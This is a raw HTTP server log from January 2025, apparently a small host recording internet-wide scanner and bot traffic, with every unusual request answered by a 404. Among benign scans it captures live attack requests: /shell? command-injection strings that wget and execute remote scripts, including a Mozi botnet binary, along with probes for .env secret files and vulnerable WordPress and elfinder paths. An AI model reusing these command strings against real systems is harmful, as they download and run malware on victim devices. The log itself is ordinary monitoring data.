[2025-01-02 09:51:02] Connection from: ('66.240.223.202', 54846) [2025-01-02 09:51:02] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 zgrab/0.x Accept: */* Accept-Encoding: gzip [2025-01-02 09:53:05] Connection from: ('118.45.193.229', 60208) [2025-01-02 09:53:05] GET / HTTP/1.0 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Connection: close [2025-01-02 09:55:32] Connection from: ('154.213.187.122', 54940) [2025-01-02 09:55:32] GET /login.rsp HTTP/1.1 Host: 76.169.26.194:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Hello World [2025-01-02 09:55:32] Sending 404: login.rsp [2025-01-02 10:04:00] Connection from: ('80.82.70.133', 60000) [2025-01-02 10:07:28] Connection from: ('42.83.147.55', 37605) [2025-01-02 10:07:29] GET / HTTP/1.1 Host: sourcegrabber.com User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/74.0.3729.169 Safari/537.36 Content-Type: text/html; charset=utf-8 Accept: */* Accept-Encoding: gzip, deflate [2025-01-02 10:12:51] Connection from: ('125.229.16.16', 52558) [2025-01-02 10:12:51] GET / HTTP/1.0 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Connection: close [2025-01-02 10:19:16] Connection from: ('49.51.50.147', 55450) [2025-01-02 10:19:17] GET / HTTP/1.1 Host: sourcegrabber.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 10:38:02] Connection from: ('83.222.191.90', 53788) [2025-01-02 10:38:02] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194:80 [2025-01-02 10:39:53] Connection from: ('195.3.223.55', 36846) [2025-01-02 10:39:53] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 10:44:50] Connection from: ('194.38.23.18', 57708) [2025-01-02 10:44:52] GET /admin/elfinder/connectors/php/connector.php HTTP/1.1 Accept: */* User-Agent: ALittle Client Host: sourcegrabber.com Content-Type: application/json Content-Length: 0 Connection: Keep-Alive [2025-01-02 10:44:52] Sending 404: admin/elfinder/connectors/php/connector.php [2025-01-02 10:56:43] Connection from: ('46.19.138.234', 40786) [2025-01-02 10:56:43] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194 [2025-01-02 11:07:18] Connection from: ('92.255.57.58', 33028) [2025-01-02 11:09:50] Connection from: ('35.195.25.18', 34342) [2025-01-02 11:09:50] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 11:09:50] Connection from: ('35.240.60.92', 42776) [2025-01-02 11:09:50] GET / HTTP/1.1 Host: 76.169.26.194 user-agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 11:12:42] Connection from: ('95.214.55.186', 41814) [2025-01-02 11:12:42] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 11:20:59] Connection from: ('43.157.170.126', 60366) [2025-01-02 11:20:59] GET / HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 11:38:15] Connection from: ('179.43.191.146', 41516) [2025-01-02 11:38:15] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194 [2025-01-02 11:39:47] Connection from: ('51.81.215.77', 54161) [2025-01-02 11:39:47] GET / HTTP/1.1 Host: 76.169.26.194 Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 [2025-01-02 11:46:06] Connection from: ('15.204.37.95', 36721) [2025-01-02 11:46:06] GET /favicon.ico HTTP/1.1 Host: 76.169.26.194 Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 [2025-01-02 11:46:06] Sending 404: favicon.ico [2025-01-02 11:57:14] Connection from: ('80.66.83.49', 58018) [2025-01-02 11:57:14] PPBS1 [2025-01-02 11:58:14] Connection from: ('80.66.83.49', 45594) [2025-01-02 11:58:14]  [2025-01-02 11:59:14] Connection from: ('80.66.83.49', 58860) [2025-01-02 11:59:14] CONNECT 80.66.83.49:80 HTTP/1.1 Host: 80.66.83.49:80 [2025-01-02 11:59:14] Sending 404: 80.66.83.49:80 [2025-01-02 11:59:32] Connection from: ('83.222.191.90', 48452) [2025-01-02 11:59:32] GET /logon.htm HTTP/1.1 Host: 127.0.0.1 User-Agent: Hello World [2025-01-02 11:59:32] Sending 404: logon.htm [2025-01-02 12:11:46] Connection from: ('154.213.187.122', 59652) [2025-01-02 12:11:46] GET /login.rsp HTTP/1.1 Host: 76.169.26.194:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Hello World [2025-01-02 12:11:46] Sending 404: login.rsp [2025-01-02 12:15:03] Connection from: ('179.43.169.162', 55034) [2025-01-02 12:15:03] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 12:16:46] Connection from: ('93.174.93.12', 60000) [2025-01-02 12:16:48] GET / HTTP/1.0 User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36 Accept: */* [2025-01-02 12:27:27] Connection from: ('5.181.190.248', 52738) [2025-01-02 12:27:29] GET / HTTP/1.1 Host: 76.169.26.194:80 User-Agent: - [2025-01-02 12:28:35] Connection from: ('95.214.55.226', 39784) [2025-01-02 12:28:36] GET / HTTP/1.1 Host: 76.169.26.194:80 User-Agent: - [2025-01-02 12:53:15] Connection from: ('64.227.180.24', 54140) [2025-01-02 12:53:15] GET / HTTP/1.1 Host: senddeath.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible) [2025-01-02 13:08:34] Connection from: ('95.214.55.32', 56210) [2025-01-02 13:08:34] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 13:11:14] Connection from: ('91.224.92.18', 55502) [2025-01-02 13:11:14] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 Host: 76.169.26.194:80 Connection: keep-alive Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 [2025-01-02 13:11:14] Sending 404: shell [2025-01-02 13:12:22] Connection from: ('195.26.242.165', 50716) [2025-01-02 13:12:22] GET /phpinfo.php HTTP/1.1 Host: senddeath.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close [2025-01-02 13:12:22] Sending 404: phpinfo.php [2025-01-02 13:16:32] Connection from: ('95.214.55.186', 54298) [2025-01-02 13:16:32] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 13:46:58] Connection from: ('195.26.242.165', 41180) [2025-01-02 13:46:58] GET /phpinfo.php HTTP/1.1 Host: sourcegrabber.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_16) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Accept-Charset: utf-8 Accept-Encoding: gzip Connection: close [2025-01-02 13:46:58] Sending 404: phpinfo.php [2025-01-02 14:17:25] Connection from: ('91.224.92.18', 41684) [2025-01-02 14:17:25] GET /shell?cd+/tmp;rm+-rf+j;nohup+wget+http:/\/194.37.81.64/random.sh;chmod+777+random.sh;./random.sh HTTP/1.1 Host: 76.169.26.194:80 Connection: keep-alive Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 [2025-01-02 14:17:25] Sending 404: shell [2025-01-02 14:20:10] Connection from: ('5.181.190.248', 36036) [2025-01-02 14:20:10] GET / HTTP/1.1 Host: 76.169.26.194:80 User-Agent: - [2025-01-02 14:25:58] Connection from: ('80.82.77.202', 60000) [2025-01-02 14:40:25] Connection from: ('206.168.34.122', 57714) [2025-01-02 14:40:29] Connection from: ('206.168.34.122', 57736) [2025-01-02 14:40:33] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 14:40:37] Connection from: ('206.168.34.122', 57434) [2025-01-02 14:40:39] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) Accept: */* Accept-Encoding: gzip [2025-01-02 14:40:40] Connection from: ('206.168.34.122', 57442) [2025-01-02 14:40:47] GET /favicon.ico HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) Accept-Encoding: gzip Connection: close [2025-01-02 14:40:47] Sending 404: favicon.ico [2025-01-02 14:40:48] Connection from: ('206.168.34.122', 36238) [2025-01-02 14:40:49] PRI * HTTP/2.0 SM Bh [2025-01-02 14:40:49] Sending 404: * [2025-01-02 15:00:30] Connection from: ('141.98.11.155', 44030) [2025-01-02 15:00:30] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 15:03:59] Connection from: ('95.214.55.186', 50356) [2025-01-02 15:03:59] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 15:08:56] Connection from: ('117.33.163.216', 42032) [2025-01-02 15:08:56] GET / HTTP/1.1 Host: sourcegrabber.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 15:15:53] Connection from: ('167.94.146.52', 34110) [2025-01-02 15:15:57] Connection from: ('167.94.146.52', 34224) [2025-01-02 15:16:00] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 15:16:04] Connection from: ('167.94.146.52', 45502) [2025-01-02 15:16:04] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) Accept: */* Accept-Encoding: gzip [2025-01-02 15:16:05] Connection from: ('167.94.146.52', 45536) [2025-01-02 15:16:05] GET /favicon.ico HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/) Accept-Encoding: gzip Connection: close [2025-01-02 15:16:05] Sending 404: favicon.ico [2025-01-02 15:16:05] Connection from: ('167.94.146.52', 45552) [2025-01-02 15:16:05] PRI * HTTP/2.0 SM Bh [2025-01-02 15:16:05] Sending 404: * [2025-01-02 15:16:59] Connection from: ('43.157.148.38', 48450) [2025-01-02 15:16:59] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 15:36:14] Connection from: ('45.77.36.115', 58185) [2025-01-02 15:36:14] GET / HTTP/1.1 Accept-Charset: UTF-8 sec-ch-ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept-Language: en-US,en;q=0.9 access-control-allow-origin: * referer: https://www.quora.com/ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none sec-fetch-dest: document Sec-Fetch-Mode: navigate Host: senddeath.com Connection: Keep-Alive Accept-Encoding: gzip,deflate [2025-01-02 15:46:05] Connection from: ('5.181.190.248', 43240) [2025-01-02 15:46:07] GET / HTTP/1.1 Host: 76.169.26.194:80 User-Agent: - [2025-01-02 16:01:11] Connection from: ('46.19.138.234', 50804) [2025-01-02 16:01:11] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194 [2025-01-02 16:19:17] Connection from: ('95.214.55.226', 53024) [2025-01-02 16:19:17] GET / HTTP/1.1 Host: 76.169.26.194:80 User-Agent: - [2025-01-02 16:29:05] Connection from: ('179.43.191.146', 45230) [2025-01-02 16:29:05] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194 [2025-01-02 16:35:55] Connection from: ('3.253.198.7', 47474) [2025-01-02 16:35:55] [2025-01-02 16:43:06] Connection from: ('195.3.223.55', 34662) [2025-01-02 16:43:06] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 17:11:04] Connection from: ('213.136.80.106', 55516) [2025-01-02 17:11:04] CONNECT www.google.com:443 HTTP/1.1 Host: www.google.com:443 User-Agent: Go-http-client/1.1 [2025-01-02 17:11:04] Sending 404: www.google.com:443 [2025-01-02 17:20:49] Connection from: ('193.41.206.24', 36846) [2025-01-02 17:20:51] GET /.env HTTP/1.1 Host: sourcegrabber.com Connection: keep-alive Accept-Encoding: gzip GET /conf/.env HTTP/1.1 Host: sourcegrabber.com Connection: keep-alive Accept-Encoding: gzip GET /wp-content/.env HTTP/1.1 Host: sourcegrabber.com Connection: keep-alive Accept-Encoding: gzip [2025-01-02 17:20:51] Sending 404: .env [2025-01-02 17:26:24] Connection from: ('3.142.47.109', 35280) [2025-01-02 17:26:26] Connection from: ('3.142.47.109', 35296) [2025-01-02 17:26:30] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36 Accept: */* Accept-Encoding: gzip [2025-01-02 17:53:30] Connection from: ('193.41.206.24', 56074) [2025-01-02 17:53:32] GET /.env HTTP/1.1 Host: senddeath.com Connection: keep-alive Accept-Encoding: gzip GET /conf/.env HTTP/1.1 Host: senddeath.com Connection: keep-alive Accept-Encoding: gzip GET /wp-content/.env HTTP/1.1 Host: senddeath.com Connection: keep-alive Accept-Encoding: gzip [2025-01-02 17:53:32] Sending 404: .env [2025-01-02 18:01:44] Connection from: ('103.199.180.78', 30224) [2025-01-02 18:01:47] GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1 User-Agent: Hello, world Host: 76.169.26.194:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive [2025-01-02 18:01:47] Sending 404: shell [2025-01-02 18:23:37] Connection from: ('195.3.223.55', 47174) [2025-01-02 18:23:37] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 18:25:50] Connection from: ('95.214.55.32', 60660) [2025-01-02 18:25:50] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 18:26:11] Connection from: ('43.153.67.21', 44674) [2025-01-02 18:26:11] GET / HTTP/1.1 Host: www.sourcegrabber.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 18:33:49] Connection from: ('176.113.115.249', 26672) [2025-01-02 18:33:49] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 Accept: */* Accept-Encoding: gzip [2025-01-02 18:51:26] Connection from: ('78.140.21.51', 42520) [2025-01-02 18:51:26] GET / HTTP/1.1 Host: 76.169.26.194:80 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Content-Length: 0 [2025-01-02 19:09:54] Connection from: ('5.181.190.248', 45938) [2025-01-02 19:09:55] GET / HTTP/1.1 Host: 76.169.26.194:80 User-Agent: - [2025-01-02 19:16:30] Connection from: ('95.214.53.198', 40088) [2025-01-02 19:16:30] GET /login.asp HTTP/1.1 Host: 76.169.26.194:80 User-Agent: Linux Gnu (cow) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 [2025-01-02 19:16:30] Sending 404: login.asp [2025-01-02 19:18:35] Connection from: ('43.159.149.216', 60104) [2025-01-02 19:18:36] GET / HTTP/1.1 Host: www.senddeath.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive Pragma: no-cache Upgrade-Insecure-Requests: 1 Connection: close [2025-01-02 19:22:42] Connection from: ('154.213.187.122', 50028) [2025-01-02 19:22:42] GET /login.rsp HTTP/1.1 Host: 76.169.26.194:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Hello World [2025-01-02 19:22:42] Sending 404: login.rsp [2025-01-02 19:27:18] Connection from: ('139.162.71.210', 56236) [2025-01-02 19:27:18] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 zgrab/0.x Accept: */* Accept-Encoding: gzip [2025-01-02 19:38:29] Connection from: ('173.3.133.68', 59423) [2025-01-02 19:38:29] GET / HTTP/1.0 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Connection: close [2025-01-02 20:19:14] Connection from: ('195.3.223.55', 48108) [2025-01-02 20:19:14] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 20:43:04] Connection from: ('194.38.23.16', 49947) [2025-01-02 20:43:04] GET /wp-content/plugins/wp-file-manager/lib/files/ HTTP/1.1 Accept: */* User-Agent: ALittle Client Host: senddeath.com Content-Type: application/json Content-Length: 0 Connection: Keep-Alive [2025-01-02 20:43:04] Sending 404: wp-content/plugins/wp-file-manager/lib/files/ [2025-01-02 21:14:42] Connection from: ('185.247.137.160', 48891) [2025-01-02 21:14:45] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/) Connection: close Accept: */* Accept-Encoding: gzip [2025-01-02 21:18:35] Connection from: ('139.162.215.45', 11873) [2025-01-02 21:18:35] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0 Accept: */* Accept-Encoding: deflate, gzip, br [2025-01-02 21:18:35] Connection from: ('139.162.215.45', 48576) [2025-01-02 21:18:38] Connection from: ('139.162.215.45', 65087) [2025-01-02 21:18:41] Connection from: ('139.162.215.45', 32003) [2025-01-02 21:45:02] Connection from: ('34.140.231.8', 50248) [2025-01-02 21:45:02] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: python-requests/2.32.3 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 21:45:03] Connection from: ('35.195.25.18', 34402) [2025-01-02 21:45:03] GET / HTTP/1.1 Host: 76.169.26.194 user-agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive [2025-01-02 22:01:11] Connection from: ('148.113.171.209', 56228) [2025-01-02 22:01:11] GET / HTTP/1.1 Host: sourcegrabber.com User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: keep-alive sec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="114", "Chromium";v="114" sec-ch-ua-mobile: ?0 sec-gpc: 1 sec-ch-ua-platform: "Windows" [2025-01-02 22:01:11] Connection from: ('148.113.171.209', 56310) [2025-01-02 22:01:11] GET /contact.html HTTP/1.1 Host: sourcegrabber.com User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Referer: http://sourcegrabber.com Connection: keep-alive sec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="114", "Chromium";v="114" sec-ch-ua-mobile: ?0 sec-gpc: 1 sec-ch-ua-platform: "Windows" [2025-01-02 22:01:11] Connection from: ('148.113.171.209', 56388) [2025-01-02 22:01:11] GET /contact.py HTTP/1.1 Host: sourcegrabber.com User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Referer: http://sourcegrabber.com Connection: keep-alive sec-ch-ua: "Not A(Brand";v="99", "Google Chrome";v="114", "Chromium";v="114" sec-ch-ua-mobile: ?0 sec-gpc: 1 sec-ch-ua-platform: "Windows" [2025-01-02 22:01:58] Connection from: ('195.3.223.55', 37368) [2025-01-02 22:01:58] GET / HTTP/1.1 Host: 76.169.26.194:80 [2025-01-02 22:43:05] Connection from: ('198.235.24.65', 49613) [2025-01-02 22:43:07] GET / HTTP/1.0 User-Agent: Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com Accept: */* [2025-01-02 22:50:44] Connection from: ('194.38.23.16', 58627) [2025-01-02 22:50:44] GET /wp-content/plugins/wp-file-manager/lib/files/ HTTP/1.1 Accept: */* User-Agent: ALittle Client Host: sourcegrabber.com Content-Type: application/json Content-Length: 0 Connection: Keep-Alive [2025-01-02 22:50:44] Sending 404: wp-content/plugins/wp-file-manager/lib/files/ [2025-01-02 23:00:38] Connection from: ('164.52.24.188', 56639) [2025-01-02 23:00:41] Connection from: ('164.52.24.188', 49587) [2025-01-02 23:00:41] GET / HTTP/1.1 Host: 76.169.26.194 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: [2025-01-02 23:01:09] Connection from: ('164.52.24.188', 58481) [2025-01-02 23:01:31] Connection from: ('46.19.138.234', 41530) [2025-01-02 23:01:31] GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en US,en;q=0.9,sv;q=0.8 Host: 76.169.26.194 [2025-01-02 23:01:41] Connection from: ('164.52.24.188', 53701) [2025-01-02 23:01:41] {"id": 1, "method": "mining.subscribe", "params": [], "jsonrpc":"2.0"} [2025-01-02 23:01:41] Sending 404: 1, [2025-01-02 23:01:44] Connection from: ('164.52.24.188', 57525) [2025-01-02 23:01:47] Connection from: ('164.52.24.188', 39461) [2025-01-02 23:01:47] {"id": 1, "jsonrpc": "2.0", "method": "login", "params": { "login": 